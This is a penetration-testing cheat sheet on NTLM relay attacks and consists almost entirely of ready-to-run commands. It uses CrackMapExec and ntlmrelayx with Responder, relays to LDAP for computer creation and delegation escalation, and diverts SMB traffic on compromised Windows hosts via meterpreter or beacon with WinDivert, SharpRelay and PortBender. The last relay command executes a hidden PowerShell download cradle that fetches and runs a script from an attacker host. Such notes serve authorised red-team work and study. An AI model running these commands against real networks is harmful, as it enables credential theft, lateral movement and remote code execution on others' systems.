NTLM Relay

Last updated 2 years ago

NTLM Relay

Generate relay list with CME and enumerate local admins when relaying:

$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server

$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445

The easier way though is to use the combination of -of/--output-file hashes.txt -ntlmchallenge 1122334455667788 options to save the hash with a predefined challenge to a file while relaying.

Relay NTLM2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP must be Off):

$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v

CVE-2019-1040-scanner

$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz

Relaying on Windows

meterpreter + SharpRelay

Divert incoming SMB traffic from Victim to Attacker's local 445 port through an elevated meterpreter session and relay it to Target via MSF SOCKS server.

1. Add a static route to the Target through the 1st meterpreter session:

meterpreter > route add 192.168.1.11/32 1

2. Start MSF SOCKS server:

msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j

3. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:

meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run

4. Relay the diverted traffic to Target through SOCKS:

$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support

When ran once, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:

PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)

beacon + PortBender

Set SOCKS server & port forwarding, upload WinDivert driver and configure redirection with PortBender:

beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445

Relay the planet:

$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'

Stop PortBender:

beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>

Last updated 2 years ago